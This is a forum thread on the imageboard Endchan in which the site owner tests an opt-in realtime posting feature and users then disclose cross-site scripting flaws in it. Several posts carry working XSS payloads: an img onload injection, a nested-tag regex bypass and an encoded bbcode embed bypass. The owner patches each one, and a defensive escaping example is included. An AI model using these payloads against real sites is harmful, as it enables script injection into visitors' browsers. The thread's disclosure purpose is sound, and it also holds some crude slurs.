/operate/ - Endchan Operations

Let us know what's up


(6.88 KB 222x222 NewFeatures-logo.png)
Realtime experiment odilitime Board owner 04/04/2017 (Tue) 16:53:25 [Preview] No. 5963
Just added a "realtime" checkbox to the thread page. This is an opt-in feature that lets you participate in seeing incoming posts (of other users that have opted-in) and broadcasts any post you draft as you make it.

Thought I'd try this experiment out and see how it goes.


Anonymous 04/04/2017 (Tue) 16:57:49 [Preview] No. 5964 del
does this dick yo?


Anonymous 04/04/2017 (Tue) 17:23:22 [Preview] No. 5965 del
doesn't work with https


Anonymous 04/04/2017 (Tue) 17:36:02 [Preview] No. 5966 del
>>5965
should be fixed now


Anonymous 04/04/2017 (Tue) 17:36:05 [Preview] No. 5967 del
dicks?


Anonymous 04/04/2017 (Tue) 17:36:34 [Preview] No. 5968 del
>>5966
how does this work tho?


Anonymous 04/04/2017 (Tue) 17:36:48 [Preview] No. 5969 del
let's see


Anonymous 04/04/2017 (Tue) 17:37:50 [Preview] No. 5970 del
>>5968
you should see other people making new posts near the realtime counter


Anonymous 04/04/2017 (Tue) 17:38:01 [Preview] No. 5971 del
reel time duzin werk!
D:


Anonymous 04/04/2017 (Tue) 17:38:16 [Preview] No. 5972 del
Still can't decide whether I like this or not.


Anonymous 04/04/2017 (Tue) 17:39:06 [Preview] No. 5973 del
Does it work?


Anonymous 04/04/2017 (Tue) 17:39:19 [Preview] No. 5974 del
>>5972
Yes, it's very subjective. That's why it's an opt-in


Anonymous 04/04/2017 (Tue) 17:39:37 [Preview] No. 5975 del
>>5970
where is realtime counter?
I'm not sure where should I be lookin


Anonymous 04/04/2017 (Tue) 17:39:45 [Preview] No. 5976 del
>>5966
how do you tell if it works?


Anonymous 04/04/2017 (Tue) 17:40:33 [Preview] No. 5977 del
>>5975
bottom of the thread


Anonymous 04/04/2017 (Tue) 17:40:38 [Preview] No. 5978 del
>>5973
I literally can't tell


Anonymous 04/04/2017 (Tue) 17:41:09 [Preview] No. 5979 del
>>5977
what happens if auto is off?


Anonymous 04/04/2017 (Tue) 17:41:12 [Preview] No. 5980 del
>>5978
yea, something is broken, I'm not seeing any typing either.


Anonymous 04/04/2017 (Tue) 17:41:45 [Preview] No. 5981 del
dddddddddoooooood it doesn't work in quick reply


Anonymous 04/04/2017 (Tue) 17:42:16 [Preview] No. 5982 del
>>5981
I saw that one


Anonymous 04/04/2017 (Tue) 17:42:21 [Preview] No. 5983 del
ohay it did something?


Anonymous 04/04/2017 (Tue) 17:42:49 [Preview] No. 5984 del
it does not work in the quick reply box thingy doo


Anonymous 04/04/2017 (Tue) 17:43:11 [Preview] No. 5985 del
>>5984
testing quick reply thingy doo
can u see dis?


Anonymous 04/04/2017 (Tue) 17:44:15 [Preview] No. 5986 del
>>5985
Try it again, I looked away for a second


Anonymous 04/04/2017 (Tue) 17:44:27 [Preview] No. 5987 del
>>5985
Yea I saw it


Anonymous 04/04/2017 (Tue) 17:44:32 [Preview] No. 5988 del
does this work thingy do ayyyyyyyyyyyyyyyyyyyyyyyyy??????????????????????? AYYYYYY?????


Anonymous 04/04/2017 (Tue) 17:45:00 [Preview] No. 5989 del
we need moar tester tbh fammmmmmalam


Anonymous 04/04/2017 (Tue) 17:45:33 [Preview] No. 5990 del
>>5989
I'm working on safari fix, so you can see me type


Anonymous 04/04/2017 (Tue) 17:46:38 [Preview] No. 5991 del
testint testing 1 2 3


Anonymous 04/04/2017 (Tue) 17:47:11 [Preview] No. 5992 del
o hey I think I saw something


Anonymous 04/04/2017 (Tue) 17:47:38 [Preview] No. 5993 del
trying quick reply box thingy dooooooooooooooooooo
(someone tell me if this is working) ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (is it working?) oooooooooooooooooooooooooooooooooooooooooooo (PLZ RESPOND) oooooooooooooooooooooooooooooooooooooooooooooooo??????


Anonymous 04/04/2017 (Tue) 17:48:07 [Preview] No. 5994 del
>>5993
Didn't see a damn thing that time


Anonymous 04/04/2017 (Tue) 17:48:24 [Preview] No. 5995 del
>>5990
>>5994
Uncaught TypeError: Cannot read property 'hasChildNodes' of undefined
at updateRealTimeCounts (megud.js:118)
at WebSocket.ws.onmessage (megud.js:153)


Anonymous 04/04/2017 (Tue) 17:48:40 [Preview] No. 5996 del
(9.62 KB 400x223 Bez tytułu.png)
heh noice


Anonymous 04/04/2017 (Tue) 17:48:52 [Preview] No. 5997 del
>>5994
>>5995
megud.js:2 Uncaught TypeError: Cannot read property 'addEventListener' of null
at attach (megud.js:2)
at megud.js:38


Anonymous 04/04/2017 (Tue) 17:49:17 [Preview] No. 5998 del
>>5996
Sweet. I'm not using the quick box tho.


Anonymous 04/04/2017 (Tue) 17:49:35 [Preview] No. 5999 del
you forgot some semicolons brah


Anonymous 04/04/2017 (Tue) 17:51:30 [Preview] No. 6000 del
doooooooood testing


Anonymous 04/04/2017 (Tue) 17:51:40 [Preview] No. 6001 del
>fuckit?


Anonymous 04/04/2017 (Tue) 17:51:54 [Preview] No. 6002 del
>>5996
Fuck it. If this becomes permanent I'm staying forever


Anonymous 04/04/2017 (Tue) 17:52:02 [Preview] No. 6003 del
>tfw lagchan


Anonymous 04/04/2017 (Tue) 17:52:13 [Preview] No. 6004 del
>>6000
dood


Anonymous 04/04/2017 (Tue) 17:52:33 [Preview] No. 6005 del
>>6004
doooooooooddddooorino?


Anonymous 04/04/2017 (Tue) 17:53:23 [Preview] No. 6006 del


Anonymous 04/04/2017 (Tue) 17:53:28 [Preview] No. 6007 del
>>6002
Although people will realize what a retard I am seeing me trying to correct all my spelling mistakes.


Anonymous 04/04/2017 (Tue) 17:53:41 [Preview] No. 6008 del
>>6006
fug, meant for >>6007


Anonymous 04/04/2017 (Tue) 17:54:34 [Preview] No. 6009 del


Anonymous 04/04/2017 (Tue) 17:54:38 [Preview] No. 6010 del
what happens when I do this?


Anonymous 04/04/2017 (Tue) 17:54:39 [Preview] No. 6011 del
>>6010
nothing


Anonymous 04/04/2017 (Tue) 17:55:07 [Preview] No. 6012 del
fuggggggggggggginwut


Anonymous 04/04/2017 (Tue) 17:55:25 [Preview] No. 6013 del
>>6014
oyy man from the future


Anonymous 04/04/2017 (Tue) 17:55:33 [Preview] No. 6014 del
>>6011
On the other site you could see the spoiler growing larger as you type.


Anonymous 04/04/2017 (Tue) 17:56:05 [Preview] No. 6015 del
>literally a botnet in your browser yo


Anonymous 04/04/2017 (Tue) 17:56:13 [Preview] No. 6016 del
>>6014
yea and preview their images. We'll get there. Just wanted to see if people would use it first. Lemme clean up all these bugs.


Anonymous 04/04/2017 (Tue) 17:56:46 [Preview] No. 6017 del
>>6016
Ok, yeah I want it now.


Anonymous 04/04/2017 (Tue) 17:57:13 [Preview] No. 6018 del
you need to send it 1 char at a time instead of the entire thingy doooooooooooooooooooooooo in each websocket frame.


Anonymous 04/04/2017 (Tue) 17:58:59 [Preview] No. 6020 del
>>6018
yea optimizations later


Anonymous 04/04/2017 (Tue) 18:03:33 [Preview] No. 6021 del
>>6020
quick reply is working, back to the scoping problems.


Anonymous 04/04/2017 (Tue) 18:03:59 [Preview] No. 6022 del
Quick reply


Anonymous 04/04/2017 (Tue) 18:04:33 [Preview] No. 6023 del
I can see those messages appearing on other boards


Anonymous 04/04/2017 (Tue) 18:04:33 [Preview] No. 6024 del
>>6015
yup, that's why it's optional


Anonymous 04/04/2017 (Tue) 18:04:35 [Preview] No. 6025 del
>>6021
I saw this from another board


Anonymous 04/04/2017 (Tue) 18:04:48 [Preview] No. 6026 del
>>6009
no clue what was going on there


Anonymous 04/04/2017 (Tue) 18:05:10 [Preview] No. 6027 del
>>5999
semicolons aren't needed


Anonymous 04/04/2017 (Tue) 18:07:50 [Preview] No. 6028 del
>>6025
yea that was the scoping problems. I think it's at least scoped to the board you're on now. Need to do thread scope next.


Anonymous 04/04/2017 (Tue) 18:35:35 [Preview] No. 6029 del
>>6028
Ok thread scoping is complete. Let me know if you guys run into any more bugs. I think it's solid.


Anonymous 04/04/2017 (Tue) 18:39:32 [Preview] No. 6030 del
>>6029
I think there's one bug with safari submit.


Anonymous 04/04/2017 (Tue) 18:39:50 [Preview] No. 6031 del
>>6030
ok that's fixed


Anonymous 04/04/2017 (Tue) 18:46:23 [Preview] No. 6032 del
Cool. I'm going to use this more often. Except when I have to type out long posts. It's weird knowing someone is watching your thought process, kek.


Anonymous 04/04/2017 (Tue) 18:46:42 [Preview] No. 6033 del
benis :-DDDDDDDDDDDDD


Anonymous 04/04/2017 (Tue) 18:47:03 [Preview] No. 6034 del
I see your benis


Anonymous 04/04/2017 (Tue) 18:47:07 [Preview] No. 6035 del
>implying benis
:-DDDDDDDDDDDDDDDDDDDDDDDDDDDDD


Anonymous 04/04/2017 (Tue) 18:47:28 [Preview] No. 6036 del
You can't see my benis, don't lie


Anonymous 04/04/2017 (Tue) 18:47:29 [Preview] No. 6037 del
I can see ur ass nigguh


Anonymous 04/04/2017 (Tue) 18:48:21 [Preview] No. 6038 del
I don't have ass, i'm skeletor


Anonymous 04/04/2017 (Tue) 19:09:30 [Preview] No. 6039 del
Ok lynx formatting is done


Anonymous 04/04/2017 (Tue) 22:01:31 [Preview] No. 6041 del
>>6039
Testan


odilitime Board owner 04/05/2017 (Wed) 01:56:16 [Preview] No. 6045 del
>>5963
Ok after some discussion, this feature radically alters the type of discussion. Just see this thread as an example of what it does.

So we're going to disable it globally. And BO can request that it be turned on if they want to have it on their boards. That way we can have more long form discussion in most of the site and a couple quicker boards for chat.


odilitime Board owner 04/05/2017 (Wed) 01:57:42 [Preview] No. 6046 del
also this is going to be open sourced. It was built to be tacked onto any IB including vichan, nntpchan or infinity.


Anonymous 04/05/2017 (Wed) 11:13:04 [Preview] No. 6047 del
(171.33 KB 640x427 IMG_6120.JPG)
This is totally........not showing anything cas of my ipad I guess.


Anonymous 04/05/2017 (Wed) 11:13:36 [Preview] No. 6048 del
Oh nevermind I see it at bottom.


Anonymous 04/05/2017 (Wed) 11:16:41 [Preview] No. 6049 del
Neat


odilitime Board owner 04/05/2017 (Wed) 13:58:55 [Preview] No. 6050 del


Anonymous 04/05/2017 (Wed) 16:50:28 [Preview] No. 6051 del
Benis in de magin' :DDDDDD


just as expected from js "programmers" Anonymous 04/05/2017 (Wed) 21:12:00 [Preview] No. 6055 del
> subblock.appendChild(document.createTextNode(data.n))
> subblock.innerHTML=lynxFormatting(data.n)

Trivial XSS: just type whatever HTML you want to inject into the browser of all the idiots that enabled this feature^Wbotnet.

For example, type: <img src="/randomBanner.js?boardUri=operate" onload="alert('odili is even worse than stephenlynx');">


odilitime Board owner 04/05/2017 (Wed) 23:47:10 [Preview] No. 6056 del
>>6055
Thanks for pointing it out. Patch has been applied.


Anonymous 04/06/2017 (Thu) 00:51:24 [Preview] No. 6057 del
Ah, yes. Regex, a javascript programmer's best friend.

Try again: <<foo>img src="/randomBanner.js?boardUri=operate" onload="alert('regex ftw ;)');">


odilitime Board owner 04/06/2017 (Thu) 01:12:44 [Preview] No. 6058 del
>>6057
Good catch. Yea regex isn't really going to be a solution because I'd need to parse how each browser parses. It's just not practical.

Fixed with some encoding. How did I do?
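
Added example, not part of any post in this thread and not megud or LynxChan code: why the tag-stripping approach fails on the input quoted in post 6057, and how escaping before formatting handles the same input. `stripTags`, `escapeHtml` and `formatPost` are hypothetical names, and the regex is an assumed stand-in for the unpublished patch.

```javascript
// Constructed input: the string quoted in post 6057 of this thread.
const sample =
  `<<foo>img src="/randomBanner.js?boardUri=operate" onload="alert('regex ftw ;)');">`;

// Hypothetical single-pass tag stripper. The thread does not show the real
// patch; this only stands in for "remove anything that looks like a tag".
function stripTags(s) {
  return s.replace(/<\/?[a-z][^>]*>/gi, '');
}

// Encode every character that can open a tag, start an entity or close a
// quoted attribute value, so user text can never change parsing context.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Hypothetical formatter (not lynxFormatting): escape first, then add markup.
// It matches the escaped form (&gt;), so every '<' in the result is its own.
function formatPost(raw) {
  return escapeHtml(raw)
    .split('\n')
    .map((line) => {
      const linked = line.replace(
        /&gt;&gt;(\d+)/g,
        '<a class="quoteLink" href="#$1">&gt;&gt;$1</a>'
      );
      // Greentext: a line starting with exactly one '>'.
      return /^&gt;(?!&gt;)/.test(line)
        ? `<span class="greenText">${linked}</span>`
        : linked;
    })
    .join('<br>');
}

// The stripper removes "<foo>" and thereby assembles a live <img> tag.
console.log(stripTags(sample));
// Escape-then-format leaves the same input as inert text.
console.log(formatPost(sample));
// Board syntax still renders.
console.log(formatPost('>>5963\n>implying'));
// In the browser, text that needs no markup at all should go through
// node.textContent (or createTextNode), never innerHTML.
```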


Anonymous 04/07/2017 (Fri) 00:05:34 [Preview] No. 6071 del
>>6058
>Fixed

You sure about that, mate?

Hex-encoded, in case stephenlynx also fucked up:


Plaintext:
https://youtube.com/watch?v=http://www.nicovideo.jp/watch/[/niconico] onmousemove=alert&40;'you&#34;re&#32;gonna&#32;keep&#32;on&#32;losing,&#32;mate'&41; style=display:block;position:absolute;top:0px;left:0px;width:2500px;height:2500px [<a href="https://youtube.com/watch?v=[niconico] [Embed] onmousemove=alert&40;'you&#34;re&#32;gonna&#32;keep&#32;on&#32;losing,&#32;mate'&41; style=display:block;position:absolute;top:0px;left:0px;width:2500px;height:2500px">Embed]


Note 1: This quite depends on the quirks-mode parsing of the browser. This XSS works in latest Tor Browser.

Note 2: This one actually took me a little while to make it effective. Since it's getting more complicated and you don't seem to be getting the message, the next one I post will be an actual exploit. But, you're welcome to keep playing if you want.
Edited last time by odilitime on 04/07/2017 (Fri) 00:48:37.


Anonymous 04/07/2017 (Fri) 00:12:03 [Preview] No. 6072 del
>>6071

>in case stephenlynx also fucked up

lolz, it seems he totally did.

So here you have a javascript-less XSS in effect, without even trying. ;)


Anonymous 04/07/2017 (Fri) 00:23:49 [Preview] No. 6073 del
>>6072

I meant of course megud-javascript-less, you understand me.


Anonymous 04/07/2017 (Fri) 00:39:11 [Preview] No. 6074 del
>>6071
It doesn't seem to work on vanilla lynxchan.

http://lynxhub.com/test/res/26.html

I copy and pasted from 'https' to 'Embed]


odilitime Board owner 04/07/2017 (Fri) 00:51:08 [Preview] No. 6075 del
>>6071
ok that was an addon that was causing it. All patched up.

Had to edit the post to trigger the rebuild. After the rebuild I don't get the error but can't be sure, as we can't really tell what you put in for input.

Is it still broken?


Anonymous 04/07/2017 (Fri) 00:57:01 [Preview] No. 6076 del
>>6071
it worked in chrome too

>>6072
I'm not seeing any problems with the hex version at all? What would decode the hex?

>>6073
I understood from the original message. The backend daemon is what processes the bbcode stuff.


Anonymous 04/07/2017 (Fri) 01:07:25 [Preview] No. 6077 del
>>6074
>I copy and pasted from 'https' to 'Embed]

>>6075
>as we can't really tell what you put in for input.

>>6076
>I'm not seeing any problems with the hex version at all? What would decode the hex?

Are you people joking? That's why I put the encoded payload. Also, if you can't into hex-encoding, then you probably shouldn't be poking here.

>>6074
>It doesn't seem to work on vanilla lynxchan.

Dunno. I said "seems", maybe it was not stephenlynx? Just doubly odili?


Anonymous 04/07/2017 (Fri) 01:11:15 [Preview] No. 6078 del
>>6077
Guess it's fixed and you can't do it any more


Anonymous 04/07/2017 (Fri) 01:16:11 [Preview] No. 6079 del
>>6078
I didn't change a thing so...


odilitime Board owner 04/07/2017 (Fri) 01:17:15 [Preview] No. 6080 del
>>6079
we did and we no longer get the alerts


Anonymous 04/07/2017 (Fri) 01:24:18 [Preview] No. 6081 del
>>6080
I was talking about vanilla lynxchan.


Anonymous 04/07/2017 (Fri) 01:39:43 [Preview] No. 6082 del
>>6081
no one was talking to you. lrn2read


Anonymous 04/07/2017 (Fri) 02:16:56 [Preview] No. 6083 del


Anonymous 04/07/2017 (Fri) 02:22:09 [Preview] No. 6084 del
>>6083
it's already delivered


Anonymous 04/07/2017 (Fri) 02:27:52 [Preview] No. 6085 del
>>6084

I'm not a programmer but as I understood >>6071 was attacking the realtime thing
but it just hit the board as well, am I wrong?

I see no fix here: https://gitgud.io/InfinityNow/megud/commits/master

I would test it myself but I don't know how without being attacked...


Anonymous 04/07/2017 (Fri) 02:28:45 [Preview] No. 6086 del
>>6084
Yea, I can confirm, it's not happening any more in the latest tor browser


Anonymous 04/07/2017 (Fri) 02:30:49 [Preview] No. 6087 del
>>6085
it was but also the backend, because the bug was copied to the realtime area from the backend.

>I see no fix
correct, we haven't posted it there yet, we want to confirm it is fixed.

>I would test it myself
Me too, but the correct input isn't clear


